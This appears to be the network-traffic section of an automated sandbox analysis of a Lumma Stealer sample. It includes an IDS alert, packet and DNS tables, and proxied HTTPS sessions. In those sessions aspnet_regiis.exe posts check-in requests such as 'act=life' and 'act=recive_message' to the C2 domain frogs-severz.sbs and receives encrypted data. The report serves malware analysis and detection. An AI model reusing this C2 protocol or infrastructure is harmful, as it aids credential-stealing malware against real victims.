2024-11-23T15:22:15.336433+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49722	172.67.155.47	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 15:21:55.393450022 CET	49704	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:55.393487930 CET	443	49704	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:55.393570900 CET	49704	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:55.394696951 CET	49704	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:55.394712925 CET	443	49704	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:56.676194906 CET	443	49704	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:56.676265955 CET	49704	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:56.698745966 CET	49704	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:56.698764086 CET	443	49704	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:56.699721098 CET	443	49704	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:56.751173973 CET	49704	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:56.870980024 CET	49704	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:56.871009111 CET	49704	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:56.871300936 CET	443	49704	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:57.563273907 CET	443	49704	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:57.563532114 CET	443	49704	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:57.563843012 CET	49704	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:57.565036058 CET	49704	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:57.565048933 CET	443	49704	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:57.565061092 CET	49704	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:57.565064907 CET	443	49704	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:57.690931082 CET	49706	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:57.690949917 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:57.691040039 CET	49706	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:57.691368103 CET	49706	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:57.691380024 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:58.960316896 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:58.960386038 CET	49706	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:58.961698055 CET	49706	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:58.961704016 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:58.962734938 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:58.963993073 CET	49706	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:58.964006901 CET	49706	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:58.964160919 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:59.681833982 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:59.682025909 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:59.682101011 CET	49706	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:59.682112932 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:59.682204008 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:59.682248116 CET	49706	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:59.682255030 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:59.690269947 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:59.690330029 CET	49706	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:59.690336943 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:59.698561907 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:59.698609114 CET	49706	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:59.698615074 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:59.751132965 CET	49706	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:59.751137972 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:59.798007965 CET	49706	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:59.801192045 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:59.844918966 CET	49706	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:59.844933987 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:59.886204004 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:59.886269093 CET	49706	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:59.886277914 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:59.886457920 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:21:59.886521101 CET	49706	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:59.886715889 CET	49706	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:21:59.886724949 CET	443	49706	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:00.035579920 CET	49708	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:00.035659075 CET	443	49708	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:00.035753965 CET	49708	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:00.036089897 CET	49708	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:00.036123037 CET	443	49708	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:01.304970980 CET	443	49708	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:01.305095911 CET	49708	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:01.306452990 CET	49708	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:01.306474924 CET	443	49708	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:01.307310104 CET	443	49708	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:01.317028999 CET	49708	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:01.317178011 CET	49708	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:01.317218065 CET	443	49708	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:02.055372000 CET	443	49708	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:02.055592060 CET	443	49708	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:02.055665970 CET	49708	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:02.055742979 CET	49708	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:02.055780888 CET	443	49708	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:02.165401936 CET	49712	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:02.165446997 CET	443	49712	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:02.165582895 CET	49712	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:02.165874004 CET	49712	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:02.165894032 CET	443	49712	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:03.441843987 CET	443	49712	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:03.441952944 CET	49712	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:03.443332911 CET	49712	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:03.443344116 CET	443	49712	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:03.444267035 CET	443	49712	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:03.445518970 CET	49712	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:03.445655107 CET	49712	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:03.445714951 CET	443	49712	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:03.445790052 CET	49712	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:03.487334013 CET	443	49712	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:04.211608887 CET	443	49712	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:04.211843014 CET	443	49712	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:04.212002993 CET	49712	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:04.212002993 CET	49712	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:04.373723984 CET	49714	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:04.373768091 CET	443	49714	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:04.373907089 CET	49714	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:04.374193907 CET	49714	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:04.374202967 CET	443	49714	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:05.594464064 CET	443	49714	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:05.594549894 CET	49714	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:05.596278906 CET	49714	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:05.596292019 CET	443	49714	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:05.596755028 CET	443	49714	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:05.606029034 CET	49714	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:05.606148958 CET	49714	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:05.606193066 CET	443	49714	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:05.606272936 CET	49714	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:05.606285095 CET	443	49714	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:06.482434988 CET	443	49714	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:06.482666969 CET	443	49714	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:06.482753038 CET	49714	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:06.482892990 CET	49714	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:06.482913017 CET	443	49714	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:06.819696903 CET	49716	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:06.819742918 CET	443	49716	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:06.819822073 CET	49716	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:06.820380926 CET	49716	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:06.820396900 CET	443	49716	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:08.097259045 CET	443	49716	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:08.097558022 CET	49716	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:08.099419117 CET	49716	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:08.099436045 CET	443	49716	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:08.099828005 CET	443	49716	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:08.109860897 CET	49716	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:08.111732006 CET	49716	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:08.111745119 CET	443	49716	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:08.867507935 CET	443	49716	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:08.867774963 CET	443	49716	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:08.867944002 CET	49716	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:08.869630098 CET	49716	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:08.869659901 CET	443	49716	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:09.376770973 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:09.376826048 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:09.376924992 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:09.377247095 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:09.377278090 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:10.655550957 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:10.655733109 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:10.657171965 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:10.657203913 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:10.657968044 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:10.659348011 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:10.660193920 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:10.660243988 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:10.660623074 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:10.660667896 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:10.660825968 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:10.660881996 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:10.661036968 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:10.661089897 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:10.661273003 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:10.661326885 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:10.661529064 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:10.661571980 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:10.661590099 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:10.661618948 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:10.661856890 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:10.661896944 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:10.661940098 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:10.662044048 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:10.662079096 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:10.707328081 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:10.707617998 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:10.707660913 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:10.707710028 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:10.707753897 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:10.707858086 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:10.707901001 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:13.266586065 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:13.266829967 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:13.266891956 CET	49717	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:13.266932011 CET	443	49717	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:13.290101051 CET	49722	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:13.290143013 CET	443	49722	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:13.290205956 CET	49722	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:13.290600061 CET	49722	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:13.290616035 CET	443	49722	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:14.602911949 CET	443	49722	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:14.603008986 CET	49722	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:14.608639002 CET	49722	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:14.608659983 CET	443	49722	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:14.608973980 CET	443	49722	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:14.610364914 CET	49722	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:14.610423088 CET	49722	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:14.610447884 CET	443	49722	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:15.336500883 CET	443	49722	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:15.336740971 CET	443	49722	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:15.337622881 CET	49722	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:15.338644028 CET	49722	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:15.338665009 CET	443	49722	172.67.155.47	192.168.2.5
Nov 23, 2024 15:22:15.338674068 CET	49722	443	192.168.2.5	172.67.155.47
Nov 23, 2024 15:22:15.338680029 CET	443	49722	172.67.155.47	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 15:21:54.891585112 CET	58396	53	192.168.2.5	1.1.1.1
Nov 23, 2024 15:21:55.133311987 CET	53	58396	1.1.1.1	192.168.2.5
Nov 23, 2024 15:21:55.140150070 CET	53163	53	192.168.2.5	1.1.1.1
Nov 23, 2024 15:21:55.387480974 CET	53	53163	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 23, 2024 15:21:54.891585112 CET	192.168.2.5	1.1.1.1	0xe702	Standard query (0)	fumblingactor.cyou	A (IP address)	IN (0x0001)	false
Nov 23, 2024 15:21:55.140150070 CET	192.168.2.5	1.1.1.1	0x4fcd	Standard query (0)	frogs-severz.sbs	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 23, 2024 15:21:55.133311987 CET	1.1.1.1	192.168.2.5	0xe702	Name error (3)	fumblingactor.cyou	none	none	A (IP address)	IN (0x0001)	false
Nov 23, 2024 15:21:55.387480974 CET	1.1.1.1	192.168.2.5	0x4fcd	No error (0)	frogs-severz.sbs		172.67.155.47	A (IP address)	IN (0x0001)	false
Nov 23, 2024 15:21:55.387480974 CET	1.1.1.1	192.168.2.5	0x4fcd	No error (0)	frogs-severz.sbs		104.21.88.250	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

frogs-severz.sbs

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	172.67.155.47	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:21:56 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: frogs-severz.sbs
2024-11-23 14:21:56 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-23 14:21:57 UTC	1015	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:21:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gc25urgcck4bqr5pr89db843cl; expires=Wed, 19-Mar-2025 08:08:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n3aa2JQ%2B5ITT1nUjruSPaKi6hGgqDXccksoeck2SQUV30RAy5SKbLWmcGW2kIZ%2Ft%2F1Jlso4JU%2BxyR7gI7foZdMz%2B3iQK%2BqXp7K6YuVc8gFX%2FzzbgCT8QXw9ONEEVzZptRMz5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71ceff6acfc335-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1491&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=1918528&cwnd=163&unsent_bytes=0&cid=71272dcd92b44079&ts=916&x=0"
2024-11-23 14:21:57 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-23 14:21:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	172.67.155.47	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:21:58 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 54 Host: frogs-severz.sbs
2024-11-23 14:21:58 UTC	54	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a 71 70 67 66 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--jqmircmzqpgf&j=
2024-11-23 14:21:59 UTC	1007	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:21:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rga4pcsp971cfaothn8q00btlu; expires=Wed, 19-Mar-2025 08:08:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hZpif26WRXpi5C1LGOkTn6VRkB7UOSfjigCyQHs%2BIjxsaHUsa1F4EFyLBCUxYfYxI1M2evoKNm8%2FCfqgSVbfqFvyvI1yA2HAYAs4V%2B3SmdoAFQ18EMWDZkLK7VQqMHPlTt1W"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71cf0d4f0f4249-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1842&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=954&delivery_rate=1536842&cwnd=225&unsent_bytes=0&cid=f26015627cd371ff&ts=735&x=0"
2024-11-23 14:21:59 UTC	362	IN	Data Raw: 34 65 35 0d 0a 7a 38 65 6d 58 59 39 74 56 42 6d 68 49 66 4e 6a 6d 6d 49 33 79 49 70 56 7a 4b 32 6d 33 53 67 55 4a 70 62 4a 73 4a 2b 48 7a 4d 79 30 35 64 42 2f 74 56 6c 34 4f 39 4a 45 30 56 6e 75 45 45 4b 74 70 6e 65 74 79 59 54 6e 54 6e 56 4b 35 61 79 63 76 66 47 68 37 76 57 68 78 7a 48 38 43 48 67 37 78 46 6e 52 57 63 45 5a 46 61 33 6b 64 2f 61 50 77 37 64 4b 64 55 72 30 71 4e 76 77 39 36 43 76 70 36 76 42 4e 65 6f 4f 4d 48 6a 4e 54 4a 59 47 2f 77 4e 64 70 75 4d 34 70 4d 43 45 38 51 70 78 58 4c 54 7a 6b 74 4c 69 75 4b 32 43 70 74 55 32 72 52 42 34 59 6f 4e 45 6e 55 47 67 51 46 61 74 36 44 6d 71 79 63 32 31 51 48 78 43 39 61 33 61 37 2b 36 71 70 4b 65 6c 77 6a 54 67 42 79 52 31 78 30 75 64 41 50 55 44 46 65 53 6f 4d 4c 61 50 6e 50 38 5a 52 45 66 6c 75 73 Data Ascii: 4e5z8emXY9tVBmhIfNjmmI3yIpVzK2m3SgUJpbJsJ+HzMy05dB/tVl4O9JE0VnuEEKtpnetyYTnTnVK5aycvfGh7vWhxzH8CHg7xFnRWcEZFa3kd/aPw7dKdUr0qNvw96Cvp6vBNeoOMHjNTJYG/wNdpuM4pMCE8QpxXLTzktLiuK2CptU2rRB4YoNEnUGgQFat6Dmqyc21QHxC9a3a7+6qpKelwjTgByR1x0udAPUDFeSoMLaPnP8ZREflus
2024-11-23 14:21:59 UTC	898	IN	Data Raw: 4f 6f 4c 58 4b 66 6c 4e 36 50 46 79 37 78 4b 63 55 37 2b 70 4e 6a 35 36 4b 4f 6f 72 61 57 45 63 61 30 49 4c 6a 75 62 41 37 49 45 36 41 64 5a 76 4b 6f 4e 37 74 43 4b 70 67 70 78 53 4c 54 7a 6b 76 58 67 72 61 32 6d 71 73 63 33 35 68 30 32 61 63 56 4f 6c 42 50 2b 42 56 75 67 36 79 57 6b 77 63 4b 38 51 33 31 4e 38 61 7a 57 76 61 76 75 71 62 58 6c 6e 48 2f 4d 41 6a 31 33 79 56 53 52 51 65 64 4f 54 4f 72 76 4f 2b 36 58 68 4c 74 4c 63 6b 58 77 70 64 7a 35 36 61 69 67 6f 4b 72 43 4e 65 30 49 50 48 50 4c 51 70 77 4b 39 77 42 51 70 2b 77 78 6f 73 37 42 2f 77 51 32 51 2b 7a 72 69 72 33 4c 71 61 32 2f 35 2f 45 38 34 77 45 78 62 59 4e 63 33 78 69 34 42 31 6e 71 73 48 65 67 79 73 75 74 53 32 52 42 2b 72 6e 65 2b 4f 4f 6a 72 61 4f 6c 77 54 6a 67 41 54 42 38 77 45 75 56 Data Ascii: OoLXKflN6PFy7xKcU7+pNj56KOoraWEca0ILjubA7IE6AdZvKoN7tCKpgpxSLTzkvXgra2mqsc35h02acVOlBP+BVug6yWkwcK8Q31N8azWvavuqbXlnH/MAj13yVSRQedOTOrvO+6XhLtLckXwpdz56aigoKrCNe0IPHPLQpwK9wBQp+wxos7B/wQ2Q+zrir3Lqa2/5/E84wExbYNc3xi4B1nqsHegysutS2RB+rne+OOjraOlwTjgATB8wEuV
2024-11-23 14:21:59 UTC	1369	IN	Data Raw: 33 66 38 37 0d 0a 2f 51 4f 52 36 66 69 4d 71 44 44 77 62 42 4b 64 30 58 36 6f 64 6d 39 71 2b 36 70 74 65 57 63 66 38 49 43 4a 6d 6e 4a 53 49 42 44 7a 51 4e 62 70 4f 38 68 37 74 43 4b 70 67 70 78 53 4c 54 7a 6b 76 62 6a 6f 71 4b 74 6f 39 59 78 34 68 30 38 61 63 64 4e 6c 51 33 32 43 56 69 6c 37 53 57 71 7a 39 61 2b 54 33 46 4b 2b 62 6e 58 76 61 76 75 71 62 58 6c 6e 48 2f 58 4f 7a 46 72 30 6b 54 54 4e 50 73 4f 57 36 33 2b 64 37 47 42 33 66 39 4e 65 67 53 73 36 39 48 78 36 4b 65 72 6f 72 66 4f 4d 2b 77 64 4d 58 4c 4b 53 5a 41 50 39 77 74 5a 72 2f 6f 38 6f 63 66 4c 76 6b 64 37 54 2f 43 72 6b 72 4f 6c 71 62 62 74 2f 59 51 65 34 41 41 6b 65 4e 49 42 70 41 4c 32 44 6c 4b 38 71 43 6a 67 31 6f 53 34 52 6a 59 63 74 4b 72 65 38 65 53 68 71 4b 65 74 78 7a 37 2f 42 6a Data Ascii: 3f87/QOR6fiMqDDwbBKd0X6odm9q+6pteWcf8ICJmnJSIBDzQNbpO8h7tCKpgpxSLTzkvbjoqKto9Yx4h08acdNlQ32CVil7SWqz9a+T3FK+bnXvavuqbXlnH/XOzFr0kTTNPsOW63+d7GB3f9NegSs69Hx6KerorfOM+wdMXLKSZAP9wtZr/o8ocfLvkd7T/CrkrOlqbbt/YQe4AAkeNIBpAL2DlK8qCjg1oS4RjYctKre8eShqKetxz7/Bj
2024-11-23 14:21:59 UTC	1369	IN	Data Raw: 6e 77 2f 78 44 46 32 6d 37 79 57 6a 79 73 79 31 51 33 4e 49 2b 61 6a 41 2f 75 54 75 34 4f 32 69 33 48 2b 31 54 78 46 49 39 47 44 52 48 72 59 5a 46 61 33 6b 64 2f 61 50 78 62 64 4e 65 45 44 6d 70 63 44 7a 34 71 36 6f 70 61 33 44 4d 2b 4d 42 4a 48 50 43 51 35 38 4f 38 41 6c 52 71 2b 77 7a 6f 73 69 45 38 51 70 78 58 4c 54 7a 6b 74 58 6d 74 4c 54 76 69 38 38 2f 36 68 38 67 59 49 4e 63 33 78 69 34 42 31 6e 71 73 48 65 71 78 4d 36 32 53 58 39 41 2b 61 76 62 38 75 79 6d 6f 36 57 33 78 54 58 2f 43 7a 4e 36 7a 45 6d 56 43 66 51 50 57 61 37 36 50 4f 36 42 68 4c 68 53 4e 68 79 30 69 39 6e 72 78 72 79 38 37 62 71 4b 4a 71 30 49 4f 6a 75 62 41 35 67 4e 2b 51 46 66 72 4f 4d 79 6f 38 2f 42 74 55 31 36 52 50 53 6f 31 50 76 6f 70 71 61 68 71 63 63 79 36 41 73 6b 61 63 64 Data Ascii: 